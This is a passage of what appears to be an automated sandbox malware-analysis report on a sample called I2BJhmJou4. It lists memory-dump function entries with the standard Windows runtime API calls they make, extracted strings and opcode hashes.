                                                          • Opcode Fuzzy Hash: 4538fd3f119ebfccef05c07daf3c44292a57c8edab061bb9a8ac19b89b5d77cf
                                                          • Instruction Fuzzy Hash: 5601F53260B6116EB69117B66CC656B2A88EF1137A328033FF920851F2FFD94C41919D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3246211626.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02ED0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_2ed0000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $^F
                                                          • API String ID: 0-2072159057
                                                          • Opcode ID: 7b640e70ded73f9c08873221f97cb98eab12bfdaea4e205fc4c25b8478a09ce9
                                                          • Instruction ID: a60480e2b274fa6d29f994d5387f5aa4067702b02597ac675eb56d1694b146b1
                                                          • Opcode Fuzzy Hash: 7b640e70ded73f9c08873221f97cb98eab12bfdaea4e205fc4c25b8478a09ce9
                                                          • Instruction Fuzzy Hash: 7A413EB2A00754AFD724AF7CCC01B6ABBFAEB85750F10856AE201DB690D379D544CF80
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _wcsrchr
                                                          • String ID: .bat$.cmd$.com$.exe
                                                          • API String ID: 1752292252-4019086052
                                                          • Opcode ID: d72b72fa5fc946e5bf17734d860b3a429cd1b964a4d3335ef3d5c7acc65a1e94
                                                          • Instruction ID: b55bede8d45b761b400ac8ce0250aded4c8690036b953bdef2cda7eece1c3866
                                                          • Opcode Fuzzy Hash: d72b72fa5fc946e5bf17734d860b3a429cd1b964a4d3335ef3d5c7acc65a1e94
                                                          • Instruction Fuzzy Hash: A8010477A24A56213614156D9C0267797988B93BB6727402FFC44EB2C2EEECED02019E
                                                          APIs
                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,381389CC,?,?,00000000,0045D6E6,000000FF,?,004439E0,0044387B,?,00443A9B,00000000), ref: 0044394B
                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044395D
                                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000,0045D6E6,000000FF,?,004439E0,0044387B,?,00443A9B,00000000), ref: 0044397F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                          • String ID: CorExitProcess$mscoree.dll
                                                          • API String ID: 4061214504-1276376045
                                                          • Opcode ID: 3daf6b45365e10327e4674e32e0bbb7648fd22c9221b51d64b84b5ca0bf51f62
                                                          • Instruction ID: 98d842734981b974643d07bc2e17aaafc6a7a08e37008b1518908caaa5ffc225
                                                          • Opcode Fuzzy Hash: 3daf6b45365e10327e4674e32e0bbb7648fd22c9221b51d64b84b5ca0bf51f62
                                                          • Instruction Fuzzy Hash: DC01A771904655EBDB118F50CC05BAEB7B8FB44B51F000626E811A22D0EBF89A04CA99
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1ec4ca088175b3d71b74edc192f962602cbf94f283bf042d020ea8e91f16aadc
                                                          • Instruction ID: 8aab27407c0a82a01c0ac988981d35579ce087bbb9e55deaa5eb6bc71ee87661
                                                          • Opcode Fuzzy Hash: 1ec4ca088175b3d71b74edc192f962602cbf94f283bf042d020ea8e91f16aadc
                                                          • Instruction Fuzzy Hash: 6C51707990024DAAEF00EFE4D844AEEB7B8FF09710F11405BE815E7250EB74DA45CB6A
                                                          APIs
                                                          • GetFileType.KERNEL32(00446BF7,?,00000000,?), ref: 00446CF4
                                                          • GetFileInformationByHandle.KERNEL32(00446BF7,?), ref: 00446D4E
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00446BF7,?,000000FF,00000000), ref: 00446DDC
                                                          • __dosmaperr.LIBCMT ref: 00446DE3
                                                          • PeekNamedPipe.KERNEL32(00446BF7,00000000,00000000,00000000,?,00000000), ref: 00446E20
                                                            • Part of subcall function 00446999: __dosmaperr.LIBCMT ref: 004469CE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
                                                          • String ID:
                                                          • API String ID: 1206951868-0
                                                          • Opcode ID: c898b499f90ca7519afdcdd7f8d9df92fdf4b61206adcc718103c1ca81f84296
                                                          • Instruction ID: 7fef5dbdd5f1ebb30aa965719069ce331059867e0b66cf3bcb9aaaf835df89e4
                                                          • Opcode Fuzzy Hash: c898b499f90ca7519afdcdd7f8d9df92fdf4b61206adcc718103c1ca81f84296
                                                          • Instruction Fuzzy Hash: 584160B5A00704AFEB24DFA5DC459ABBBF9FF89304B11452EF846D3610E734A845CB16
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _strlen
                                                          • String ID: %1.17g$,]{: }$null
                                                          • API String ID: 4218353326-1793514501
                                                          • Opcode ID: 1febabab61847861726e4eccc5dd4458819082e0fa0a32231921fccec61d2490
                                                          • Instruction ID: dfdaef210c9fde1e563ad86d0075ca4844e5c450f328af3dc752b2d50a02e017
                                                          • Opcode Fuzzy Hash: 1febabab61847861726e4eccc5dd4458819082e0fa0a32231921fccec61d2490
                                                          • Instruction Fuzzy Hash: 68B1DFE2B042005BD7006A669C5162B65D98FD1359F09453FEF4AF33C2FA3EDE19829B
                                                          APIs
                                                          • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00459CCA,?,?,00000000,00000000,00000000,?), ref: 00459DE9
                                                          • CatchIt.LIBVCRUNTIME ref: 00459ECF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CatchEncodePointer
                                                          • String ID: MOC$RCC
                                                          • API String ID: 1435073870-2084237596
                                                          • Opcode ID: f6539cf28fa7df93cb7a4fd0398e0aeb39c553d0f7c18ec6f96af6878300a19c
                                                          • Instruction ID: 680bccfe0e0854ffc158b5e00edb6862103a1416f9df0b4f366e0dcb6488795f
                                                          • Opcode Fuzzy Hash: f6539cf28fa7df93cb7a4fd0398e0aeb39c553d0f7c18ec6f96af6878300a19c
                                                          • Instruction Fuzzy Hash: 34416871900209EFDF15DF98CD82AAEBBB5FF48305F18805AF904672A2D3399D54DB58
                                                          APIs
                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,00456DCD,?,0000376F,0045FB2F,?,?,?,00456C15,00000000,FlsAlloc,00465EF0,00465EF8), ref: 00456D3E
                                                          • GetLastError.KERNEL32(?,00456DCD,?,0000376F,0045FB2F,?,?,?,00456C15,00000000,FlsAlloc,00465EF0,00465EF8,?,^D,0044C1B0), ref: 00456D48
                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000000,?,^D,0044C1B0,0044C294,00000003,0044069B,?,?,?,?,00000000,0045FB2F,004058C6), ref: 00456D70
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LibraryLoad$ErrorLast
                                                          • String ID: api-ms-
                                                          • API String ID: 3177248105-2084034818
                                                          • Opcode ID: 1c601aedc7284344527d2769353e9bde843b729d446c6642f172212a38ab6b00
                                                          • Instruction ID: 0ecaf6013e36b0431d801e3916b08b76fdb95d3f1c140b132a01747a849ad822
                                                          • Opcode Fuzzy Hash: 1c601aedc7284344527d2769353e9bde843b729d446c6642f172212a38ab6b00
                                                          • Instruction Fuzzy Hash: 04E012303C4204B7DB101B61DC06B593A789B10B56F540431FD0DA51E1EBF5A858954E
                                                          APIs
                                                          • GetConsoleOutputCP.KERNEL32(381389CC,00455523,00000000,?), ref: 004507AD
                                                            • Part of subcall function 00453203: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,0045769E,?,00000000,-00000008), ref: 004532AF
                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00450A08
                                                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00450A50
                                                          • GetLastError.KERNEL32 ref: 00450AF3
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                          • String ID:
                                                          • API String ID: 2112829910-0
                                                          • Opcode ID: 96a8a5487e7c3d3faf6390a68133758f583929af7c12fd611465a668075fbc12
                                                          • Instruction ID: e52ebc46d8e9f13757024da4890b50ba647b118a1bf42f91cd2d0be3dbea7dc8
                                                          • Opcode Fuzzy Hash: 96a8a5487e7c3d3faf6390a68133758f583929af7c12fd611465a668075fbc12
                                                          • Instruction Fuzzy Hash: A0D17BB9D00248AFDF15CFA8C8809EDBBB4FF09315F18816AE855E7352E734A946CB54
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AdjustPointer
                                                          • String ID:
                                                          • API String ID: 1740715915-0
                                                          • Opcode ID: c82cfddcd8694e2bdb1e743d5f084ed403ad5a837ea31cf34a60513f078c136f
                                                          • Instruction ID: 4fadf7dd59c53bd1b12e0029445d2e83e107cc747934abb9f5ec8e89f131d8d2
                                                          • Opcode Fuzzy Hash: c82cfddcd8694e2bdb1e743d5f084ed403ad5a837ea31cf34a60513f078c136f
                                                          • Instruction Fuzzy Hash: 8C51F276A14202EFDB289F11D981BAA73A4EF18706F14452FEC0157292E73DEC49CB99
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f5b8450e9b4afcbafb4f61d0450c1d7e417d22fbc98e5ee0c888f4ba12a7ca7c
                                                          • Instruction ID: a7f2c4688ec43d2a23ac8beb8ca83e3134fddb6ab0c13f52a90a8fe9f94a791d
                                                          • Opcode Fuzzy Hash: f5b8450e9b4afcbafb4f61d0450c1d7e417d22fbc98e5ee0c888f4ba12a7ca7c
                                                          • Instruction Fuzzy Hash: EE412AF2A00304AFD7249F79CC42B6AFBE8EB84756F10452FF551DB382D2B99A058784
                                                          APIs
                                                          • VirtualQuery.KERNEL32(83000000,381389CC,0000001C,381389CC,?,?,?), ref: 0044C7B6
                                                          • __FindPESection.LIBCMT ref: 0044C7F3
                                                          • _ValidateScopeTableHandlers.LIBCMT ref: 0044C813
                                                          • __FindPESection.LIBCMT ref: 0044C82D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FindSection$HandlersQueryScopeTableValidateVirtual
                                                          • String ID:
                                                          • API String ID: 1876002356-0
                                                          • Opcode ID: c5c89110117f95e94e9ebb8d4fd24969d439cb80e1b6e8bbea251b6fa9d5d390
                                                          • Instruction ID: 16c3c4676ac924f9bbc116e317de4c153b4417dc4f771cedf4f7c3d11fae8c19
                                                          • Opcode Fuzzy Hash: c5c89110117f95e94e9ebb8d4fd24969d439cb80e1b6e8bbea251b6fa9d5d390
                                                          • Instruction Fuzzy Hash: CF31B5B5E022159BFF54CBA9A9C07BE73A4EB09315F09007ADD41E7352E739DC018BA9
                                                          APIs
                                                          • SetFilePointerEx.KERNEL32(?,00000000,00000000,004481E1,00000001,?,004481E1,h5@,?,00000000), ref: 00450F57
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00403568,00000000), ref: 00450F64
                                                          • SetFilePointerEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00403568,00000000), ref: 00450F8A
                                                          • SetFilePointerEx.KERNEL32(?,00000000,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00450FB0
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FilePointer$ErrorLast
                                                          • String ID:
                                                          • API String ID: 142388799-0
                                                          • Opcode ID: cfe5fe78128bb7dd68b840a0eb5d6fe201827b23293f70a06ce6f48395b8db59
                                                          • Instruction ID: 1514e75016c253887b100742bd2e0aa0853bf3b84a7615600f3982ba0bc5b80c
                                                          • Opcode Fuzzy Hash: cfe5fe78128bb7dd68b840a0eb5d6fe201827b23293f70a06ce6f48395b8db59
                                                          • Instruction Fuzzy Hash: B1116636805219ABDF209F51CC48A9F3F7DFB00725F004115FC20922A1D7B19A40CAA5
                                                          APIs
                                                          • GetFullPathNameW.KERNEL32(?,?,?,00000000,00455C9F,00000000,?,0045B41C,00455C9F,00446C37,?,00000000,00000104,?,00000001,00000000), ref: 00455DBC
                                                          • GetLastError.KERNEL32(?,0045B41C,00455C9F,00446C37,?,00000000,00000104,?,00000001,00000000,00000000,?,00455C9F,?,00000104,00446C37), ref: 00455DC6
                                                          • __dosmaperr.LIBCMT ref: 00455DCD
                                                          • GetFullPathNameW.KERNEL32(?,?,?,00000000,?,?,0045B41C,00455C9F,00446C37,?,00000000,00000104,?,00000001,00000000,00000000), ref: 00455DF7
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FullNamePath$ErrorLast__dosmaperr
                                                          • String ID:
                                                          • API String ID: 1391015842-0
                                                          • Opcode ID: 40aed38a608d94dd85f4980ee519dcea4f2932da946f037f09bb496e255caaba
                                                          • Instruction ID: 83aad2bcbc88ad1b691cbbc28925ead7dadcf548e2ab308fdfae5f9a37bb2b5e
                                                          • Opcode Fuzzy Hash: 40aed38a608d94dd85f4980ee519dcea4f2932da946f037f09bb496e255caaba
                                                          • Instruction Fuzzy Hash: 50F0A436200700AFDB205F67CC09E277BBDEF45361710842AF956C2521DB76EC14CB68
                                                          APIs
                                                          • GetFullPathNameW.KERNEL32(?,?,?,00000000,00455C9F,00000000,?,0045B3A4,00455C9F,00455C9F,00446C37,?,00000000,00000104,?,00000001), ref: 00455E22
                                                          • GetLastError.KERNEL32(?,0045B3A4,00455C9F,00455C9F,00446C37,?,00000000,00000104,?,00000001,00000000,00000000,?,00455C9F,?,00000104), ref: 00455E2C
                                                          • __dosmaperr.LIBCMT ref: 00455E33
                                                          • GetFullPathNameW.KERNEL32(?,?,?,00000000,?,?,0045B3A4,00455C9F,00455C9F,00446C37,?,00000000,00000104,?,00000001,00000000), ref: 00455E5D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FullNamePath$ErrorLast__dosmaperr
                                                          • String ID:
                                                          • API String ID: 1391015842-0
                                                          • Opcode ID: 978842d79e248325d5d1c5fcbdbac71f7ead08704c26e555b85ab8378b580012
                                                          • Instruction ID: 58d23dfaa7b1bff066b533c88cf6507f29fdd6be1c16f2e24496f8287ce13408
                                                          • Opcode Fuzzy Hash: 978842d79e248325d5d1c5fcbdbac71f7ead08704c26e555b85ab8378b580012
                                                          • Instruction Fuzzy Hash: 49F0A436200600AFDF205F72DC09E2B7BADEF44361714842AF959D2121DB75EC14CB58
                                                          APIs
                                                          • WriteConsoleW.KERNEL32(00000000,00455523,00000000,00000000,00000000,?,00459F6A,00000000,00000001,00000000,?,?,00450B47,?,00455523,00000000), ref: 0045BD1F
                                                          • GetLastError.KERNEL32(?,00459F6A,00000000,00000001,00000000,?,?,00450B47,?,00455523,00000000,?,?,?,00450492,00443CFB), ref: 0045BD2B
                                                            • Part of subcall function 0045BD7C: CloseHandle.KERNEL32(FFFFFFFE,0045BD3B,?,00459F6A,00000000,00000001,00000000,?,?,00450B47,?,00455523,00000000,?,?), ref: 0045BD8C
                                                          • ___initconout.LIBCMT ref: 0045BD3B
                                                            • Part of subcall function 0045BD5D: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0045BCF9,00459F57,?,?,00450B47,?,00455523,00000000,?), ref: 0045BD70
                                                          • WriteConsoleW.KERNEL32(00000000,00455523,00000000,00000000,?,00459F6A,00000000,00000001,00000000,?,?,00450B47,?,00455523,00000000,?), ref: 0045BD50
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                          • String ID:
                                                          • API String ID: 2744216297-0
                                                          • Opcode ID: c2a2ecc1c2a42e22a3f830c2b4be3aaf5d7a6f5fb3480db1df2f59ef4a2b949f
                                                          • Instruction ID: a34e4e029ef2e4d5dd3ba3bcd054cc3c3a598788143b8b19420d5231d0b345e8
                                                          • Opcode Fuzzy Hash: c2a2ecc1c2a42e22a3f830c2b4be3aaf5d7a6f5fb3480db1df2f59ef4a2b949f
                                                          • Instruction Fuzzy Hash: 0CF0F836140119BBCF221F959C08ADA3F3AEF493A1F044021FE09D5171D7B28864ABD9
                                                          APIs
                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 004598A6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ___except_validate_context_record
                                                          • String ID: csm$csm
                                                          • API String ID: 3493665558-3733052814
                                                          • Opcode ID: 2ddf6b46ba9927e19a1a0e06cd3d58e98e189ea3bbd4e4ea7d064f6212a0d210
                                                          • Instruction ID: 4df6c2a030d07bf616ce91cf83237d0554f1a363a859cf179326f8a266afaebb
                                                          • Opcode Fuzzy Hash: 2ddf6b46ba9927e19a1a0e06cd3d58e98e189ea3bbd4e4ea7d064f6212a0d210
                                                          • Instruction Fuzzy Hash: 0E31C4B6400219EBCF269F51CC4096A7B65FF0A716B18419FFC5449323C73ACC66DB8A